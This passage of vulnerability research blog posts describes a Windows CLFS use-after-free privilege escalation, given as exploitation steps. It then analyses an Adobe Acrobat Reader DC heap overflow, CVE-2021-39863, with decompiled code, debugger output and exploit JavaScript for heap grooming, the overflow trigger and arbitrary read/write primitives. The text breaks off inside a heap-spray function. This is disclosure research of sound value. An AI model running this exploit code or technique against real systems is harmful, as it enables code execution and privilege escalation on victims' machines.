The StateData pointer is first retrieved from the related name instance of type _WNF_NAME_INSTANCE at [8]. If the StateData pointer is NULL (as is the case initially) at [9], or if the current size is lesser than the size of the new data at [10], memory is allocated from the Paged Pool for the new StateData pointer at [11]. It important to note that the size of allocation is the size of the new data (Length) plus 0x10, to account for the _WNF_STATE_DATA header. The Header and AllocateSize fields shown at [6] and [7] of the _WNF_STATE_DATA header are then initialized at [12].

Note that if the current StateData pointer is large enough for the new data, code execution from [8] jumps directly to [13]. Length bytes from the InputBuffer parameter are then copied into the StateData pointer at [13]. The DataSize field in the _WNF_STATE_DATA header is also filled at [13].

Deleting WNF State Name

A WNF State Name can be deleted via a call to NtDeleteWnfStateName(). Among other things, this function frees the associated name instance and StateData buffers described above.

Querying WNF State Data

When WNF State Data is queried via a call to NtQueryWnfStateData(), ExpWnfReadStateData() is called internally to read from the StateData pointer. The pseudocode of ExpWnfReadStateData() is listed below.

ExpWnfReadStateData(_WNF_NAME_INSTANCE *NameInstance,undefined4 *param_2,void *OutBuf,uint OutBufSize,undefined4 *param_5)




    StateData = NameInstance->StateData;
    if (StateData == NULL) {
        *param_2 = 0;
    else {
        if (StateData != (_WNF_STATE_DATA *)0x1) {
            *param_2 = StateData->ChangeStamp;
            *param_5 = StateData->DataSize;


            if (OutBufSize < StateData->DataSize) {
                local_48 = 0xc0000023;
            else {


                RtlCopyMemory(OutBuf,StateData + 1,(ulonglong)StateData->DataSize);
                local_48 = 0;
            goto LAB_fffff8054ce2383f;
        *param_2 = NameInstance->CurrentChangeStamp;

The OutBuf and OutBufSize parameters to the function are provided by the user to store the queried data. The StateData pointer is first retrieved from the related name instance of type _WNF_NAME_INSTANCE at [14]. If the output buffer is large enough to store the data (which is checked at [15]), StateData->DataSize bytes starting right after the StateData header are copied into the output buffer at [16].

Pipe Attributes

After the creation of a pipe, a user has the ability to add attributes to the pipe. The attributes are a key-value pair, and are stored into a linked list. The PipeAttribute object is allocated in the PagedPool, and has the following structure:

struct PipeAttribute {
    LIST_ENTRY list;
    char * AttributeName;
    uint64_t AttributeValueSize;
    char * AttributeValue;
    char data[0];

The size of the allocation and the data is fully controlled by an attacker. The AttributeName and AttributeValue are pointers pointing at different offsets of the data field. A pipe attribute can be created on a pipe using the NtFsControlFile syscall, and the 0x11003C control code.

The attribute’s value can then be read using the 0x110038 control code. The AttributeValue pointer and the AttributeValueSize will be used to read the attribute value and return it to the user.

Steps for Exploitation

Exploitation of the vulnerability involves the following steps:

  1. Spray large number of Pipe Attributes of size 0x7a00 to use up all fragmented chunks in VS backend and allocate new ones. The last few will each be allocated on separate segments of size 0x11000, with the last (0x11000-0x7a00) bytes of each segment unused.
  2. Delete one of the later Pipe Attributes. This will consolidate the first 0x7a00 bytes with the remaining bytes in the rest of the segment, and put the entire segment back in the VS backend.
  3. Allocate the vulnerable chunk of size 0x7a00 by opening the malicious Base Log File. This will get allocated from the freed segment in Step 2. Similar to Step 1, the last (0x11000-0x7a00) bytes will be unused. The vulnerable chunk will be freed for the first time shortly afterwards. Similar to Step 2, the entire segment will be back in the VS backend.
  4. Spray large number of WNF_STATE_DATA objects of size 0x1000. This will first use up fragmented chunks in VS backend and then the entire freed segment in Step 3. Note that no size lesser than 0x1000 (and maximum is 0x1000 for WNF_STATE_DATA objects) can be used because that will have an additional header that will corrupt the header in the vulnerable chunk, blocking a double free.
  5. Free the vulnerable chunk for the second time. This will end up freeing the memory of one of the WNF_STATE_DATA objects allocated in Step 4, without actually releasing the object.
  6. Allocate a WNF_STATE_DATA object of size 0x1000 over the freed chunk in Step 5. This will create 2 entirely overlapping WNF_STATE_DATA objects of size 0x1000.
  7. Free all the WNF_STATE_DATA objects allocated in Step 4. This will once again put the entire vulnerable segment (of size 0x11000) back in the VS backend.
  8. Spray large number of WNF_STATE_DATA objects of size 0x700, each with unique data. This will first use up fragmented chunks in VS backend and then the entire freed segment in Step 7. Each page in the freed segment is now split as (0x700,0x700,0x1d0 (remaining)). Note, here size 0x700 can be used because the rest of the exploit doesn’t require any more freeing of the vulnerable chunk. This now creates 2 overlapping WNF_STATE_DATA objects, one of size 0x1000 (allocated in Step 6) and other of size 0x700 (allocated here). Size 0x700 is specifically chosen for 2 reasons. The first reason being that the additional chunk header (of size 0x10) in the 0x700-sized object means that the StateData header of the 0x1000-sized object is 0x10 bytes before the StateData header of the 0x700-sized object. Thus, the StateData header of the 0x700-sized object overlaps with the StateData data of the 0x1000-sized object.
  9. Update the StateData of the 0x1000-sized object to corrupt the StateData header of the 0x700-sized object such that the AllocatedSize and DataSize fields of the 0x700-sized object is increased from 0x6c0 (0x700-0x40) to 0x7000 each. Now, querying or updating the 0x700-sized object will result in an out-of-bounds read/write into adjacent 0x700-sized WNF_STATE_DATA objects allocated in Step 8.
  10. Identify the corrupted 0x700-sized WNF_STATE_DATA object by querying all of them with a Buffer size of 0x700. All will return successfully except for the corrupted one, which will return with an error indicating that the buffer size is too small. This is because the DataSize field was increased (refer to Step 9).
  11. Query the corrupted 0x700-sized WNF_STATE_DATA object (identified in Step 10) to further identify the next 2 adjacent WNF_STATE_DATA objects using the OOB read. The first of these will be at offset 0x710 and the second will be at offset 0x1000 from the corrupted 0x700-sized WNF_STATE_DATA object.
  12. Free the second newly identified WNF_STATE_DATA object of size 0x700.
  13. Create a new process, which will run with the same privileges as the exploit process. The token of this new process is allocated over the freed WNF_STATE_DATA object in Step 12. This is the second reason for choosing size 0x700, as the size of the token object is also 0x700.
  14. Query the corrupted 0x700-sized WNF_STATE_DATA object (identified in Step 10) to identify the contents of the token allocated in Step 13 using the OOB read. Calculate the offset to the Privileges.Enabled and Privileges.Present fields in the token*object.
  15. Update the corrupted 0x700-sized WNF_STATE_DATA object to corrupt the first adjacent object (identified in Step 11) using the OOB write. Increase the AllocatedSize and DataSize fields in the StateData pointer (refer to Step 9).
  16. Update the most recent corrupted WNF_STATE_DATA object (Step 15) to corrupt the adjacent token object using the OOB write. Overwrite the Privileges.Enabled and Privileges.Presentfields in the token object to 0xffffffffffffffff, thereby setting all the privileges. This completes the LPE.


We hope you enjoyed reading the deep dive into a use-after-free in CLFS, and if you did, go ahead and check out our other blog posts on vulnerability analysis and exploitation. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Exploiting a use-after-free in Windows Common Logging File System (CLFS) appeared first on Exodus Intelligence.

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

4 October 2021 at 13:52

By Sergi Martinez

In late June, we published a blog post containing analysis of exploitation of a heap-buffer overflow vulnerability in Adobe Reader, a vulnerability that we thought corresponded to CVE-2021-21017. The starting point for the research was a publicly posted proof-of-concept containing root-cause analysis. Soon after publishing the blog post, we learnt that the CVE was not authoritative and that the publicly posted proof-of-concept was an 0day, even if the 0day could not be reproduced in the patched version. We promptly pulled the blog post and began investigating.

Further research showed that the vulnerability continued to exist in the latest version and was exploitable with only a few changes to our exploit. We reported our findings to Adobe. Adobe assigned CVE-2021-39863 to this vulnerability and released an advisory and patched versions of their products on September 14th, 2021.

Since the exploits were very similar, this post largely overlaps with the blog post previously removed. ItΒ analyzes and exploits CVE-2021-39863, a heap buffer overflow in Adobe Acrobat Reader DC up to and including version 2021.005.20060.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.


A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.


Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
  __int16 v5; // di
  wchar_t *v6; // ebx
  CHAR *v7; // eax
  CHAR v8; // dl
  __int64 v9; // rax
  wchar_t *v10; // ecx
  __int64 v11; // rax
  int v12; // eax
  int v13; // eax
  int v14; // eax


  v77 = 0;
  v76 = 0;
  v5 = 1;
  *(_QWORD *)v78 = 0i64;
  *(_QWORD *)iMaxLength = 0i64;
  v6 = 0;
  v49 = 0;
  v62 = 0;
  v74 = 0;
  if ( !a5 )
    return 0;
  *a5 = 0;
  v7 = lpString;


  if ( lpString && *lpString && (v8 = lpString[1]) != 0 && *lpString == (CHAR)0xFE && v8 == (CHAR)0xFF )


    v9 = sub_2581890C(lpString);
    v78[1] = v9;
    if ( (HIDWORD(v9) & (unsigned int)v9) == -1 )
      *a5 = -2;
      return 0;
    v7 = lpString;


    v78[1] = v78[0];
  v10 = Source;
  if ( !Source || !v7 || !String || !a4 )
    *a5 = -2;
    goto LABEL_86;


  if ( *(_BYTE *)Source != 0xFE )
    goto LABEL_25;
  if ( *((_BYTE *)Source + 1) == 0xFF )
    v11 = sub_2581890C(Source);
    iMaxLength[1] = v11;
    if ( (HIDWORD(v11) & (unsigned int)v11) == -1 )
      goto LABEL_9;
    v10 = Source;
    v12 = iMaxLength[1];
    v12 = iMaxLength[0];


  if ( *(_BYTE *)v10 == 0xFE && *((_BYTE *)v10 + 1) == 0xFF )
    v13 = v12 + 2;
    v14 = sub_25802A44((LPCSTR)v10);
    v10 = v37;
    v13 = v14 + 1;
  iMaxLength[1] = v13;


  v15 = (CHAR *)sub_25802CD5(v10, 1, v13);
  v77 = v15;
  if ( !v15 )
    *a5 = -7;
    return 0;


  sub_25802D98(v38, (wchar_t *)v15, Source, iMaxLength[1]);


  if ( *lpString == (CHAR)0xFE && lpString[1] == (CHAR)0xFF )
    v17 = v78[1] + 2;
    v18 = sub_25802A44(lpString);
    v16 = v39;
    v17 = v18 + 1;
  v78[1] = v17;


  v19 = (CHAR *)sub_25802CD5(v16, 1, v17);
  v76 = v19;
  if ( !v19 )
    *a5 = -7;
    v5 = 0;
    goto LABEL_87;


  sub_25802D98(v40, (wchar_t *)v19, (wchar_t *)lpString, v78[1]);
  if ( !(unsigned __int16)sub_258033CD(v77, iMaxLength[1], a5) || !(unsigned __int16)sub_258033CD(v76, v78[1], a5) )
    goto LABEL_86;


  v20 = sub_25802400(v77, v42);
  if ( v20 || (v20 = sub_25802400(v76, v50)) != 0 )
    *a5 = v20;
    goto LABEL_86;
  if ( !*(_BYTE *)Source || (v21 = v42[0], v50[0] != 5) && v50[0] != v42[0] )
    v35 = sub_25802FAC(v50);
    v23 = a4;
    v24 = v35 + 1;
    if ( v35 + 1 > *a4 )
      goto LABEL_44;
    *a4 = v35;
    v25 = v50;
    goto LABEL_82;
  if ( *lpString )
    v26 = v55;
    v63[1] = v42[1];
    v63[2] = v42[2];
    v27 = v51;
    v63[0] = v42[0];
    v73 = 0i64;
    if ( !v51 && !v53 && !v55 )
      if ( (unsigned __int16)sub_25803155(v50) )
        v28 = v44;
        v64 = v42[3];
        v65 = v42[4];
        v66 = v42[5];
        v67 = v42[6];
        v29 = v43;
        if ( v49 == 1 )
          v29 = v43 + 2;
          v28 = v44 - 1;
          v43 += 2;
        v69 = v28;
        v68 = v29;
        v70 = v45;
        if ( v58 )
          if ( *v59 != 47 )


            v6 = (wchar_t *)sub_25802CD5((wchar_t *)(v58 + 1), 1, v58 + 1 + v46);
            if ( !v6 )
              v23 = a4;
              v24 = v58 + v46 + 1;
              goto LABEL_44;
            if ( v46 )


              sub_25802D98(v41, v6, v47, v46 + 1);
              if ( *((_BYTE *)v6 + v46 - 1) != 47 )
                v31 = sub_25818D6E(v30, (char *)v6, 47);
                if ( v31 )
                  *(_BYTE *)(v31 + 1) = 0;
                  *(_BYTE *)v6 = 0;
            if ( v58 )


              v32 = sub_25802A44((LPCSTR)v6);
              sub_25818C6A((char *)v6, v59, v58 + 1 + v32);
            sub_25802E0C(v6, 0);
            v71 = sub_25802A44((LPCSTR)v6);
            v72 = v6;
            goto LABEL_75;
          v71 = v58;
          v72 = v59;


  if ( v77 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v77);
  if ( v76 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v76);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824098 + 12))(v6);
  return v5;

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

63ee7d70 55              push    ebp
0:000> dd poi(esp+4) L84
093499c8  7468fffe 3a737074 6f672f2f 656c676f
093499d8  6d6f632e 4141412f 41414141 41414141
093499e8  41414141 41414141 41414141 41414141
093499f8  41414141 41414141 41414141 41414141


09349b98  41414141 41414141 41414141 41414141
09349ba8  41414141 41414141 41414141 41414141
09349bb8  41414141 41414141 41414141 2f2f3a41
09349bc8  00000000 0009000a 00090009 00090009
0:000> da poi(esp+4) L84
093499c8  "..https://google.com/AAAAAAAAAAA"
09349a48  "AAAA"
0:000> dd poi(esp+8)
0b943ca8  61616262 61616161 61616161 61616161
0b943cb8  61616161 61616161 61616161 61616161
0b943cc8  61616161 61616161 61616161 61616161
0b943cd8  61616161 61616161 61616161 61616161
0b943ce8  61616161 61616161 61616161 61616161
0b943cf8  61616161 61616161 61616161 61616161
0b943d08  61616161 61616161 61616161 61616161
0b943d18  61616161 61616161 61616161 61616161
0:000> da poi(esp+8)
0b943ca8  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943cc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943ce8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943d08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"


0b943da8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943dc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943de8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943e08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter (i.e. the base URL) is a valid Unicode UTF-16BE encoded string. If it is valid, the length of that string is calculated at [2] and stored in v78[1]. If it is not a valid UTF-16BE encoded string, v78[1] is set to 0 at [3]. The function that calculates the Unicode string length, sub_2581890C(), performs additional checks to ensure that the string passed as a parameter is a valid UTF-16BE encoded string. The following listing shows the decompiled code of this function.

int __cdecl sub_2581890C(char *a1)
  char *v1; // eax
  char v2; // cl
  int v3; // esi
  char v4; // bl
  char *v5; // eax
  int result; // eax

  v1 = a1;
  if ( !a1 || *a1 != (char)0xFE || a1[1] != (char)0xFF )
    goto LABEL_12;
  v2 = 0;
  v3 = 0;
    v4 = *v1;
    v5 = v1 + 1;
    if ( !v5 )
    v2 = *v5;
    v1 = v5 + 1;
    if ( !v4 )
      goto LABEL_10;
    if ( !v2 )
    v3 += 2;
  while ( v1 );
  if ( v4 )
    goto LABEL_12;
  if ( !v2 )
    result = v3;
    result = -1;
  return result;

The code listed above returns the length of the UTF-16BE encoded string passed as a parameter. Additionally, it implicitly performs the following checks to ensure the string has a valid UTF-16BE encoding:

  • The string must terminate with a double null byte.
  • The words composing the string that are not the terminator must not contain a null byte.

If any of the checks above fail, the function returns -1.

Continuing with the first function mentioned in this section, at [4] the same checks already described are applied to the first parameter (i.e. the relative URL). At [5] the length of the Source variable (i.e. the base URL) is calculated taking into account its encoding. The function sub_25802A44() is an implementation of the strlen() function that works for both Unicode and ANSI encoded strings. At [6] an allocation of the size of the Source variable is performed by calling the function sub_25802CD5(), which is an implementation of the known calloc() function. Then, at [7], the contents of the Source variable are copied into this new allocation using the function sub_25802D98(), which is an implementation of the strncpy function that works for both Unicode and ANSI encoded strings. These operations performed on the Source variable are equally performed on the lpString variable (i.e. the relative URL) at [8], [9], and [10].

The function at [11], sub_25802400(), receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [12] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [11]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Afterwards, at [13] the base URL is copied into the memory allocated to host the concatenation and at [14] its length is calculated and provided as a parameter to the call to sub_25818C6A. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [14] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_sub_25818C6A(char *Destination, char *Source, int a3)
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);


  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )


    sub_258189D6(Destination, Source);
    result = 1;


    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  return result;

In the above listing, at [15] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_258189D6 is called at [16]. Otherwise the strncat function at [17] is called.

The function sub_258189D6 called at [16] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_258189D6(LPSTR lpString1, LPCSTR lpString2)
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);


  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )


    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      while ( v6 );
    while ( v7 );


    lstrcatA(lpString1, lpString2);
  return lpString1;

In the function listed above, at [18] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [19]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called at [20].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.


We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution.Β 

Adobe Acrobat Reader DC version 2021.005.20048 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

The exploit does not bypass the following protection mechanisms:

  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {


    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);


    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;


    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();


    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;

    return arrayBuffers;

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the Code Analysis section of this post.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {


    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);


    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];


    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    return rw;

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    return dataView.getUint32(addrOffset, true);

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    dataView.setUint32(addrOffset, data, true);

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;


    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
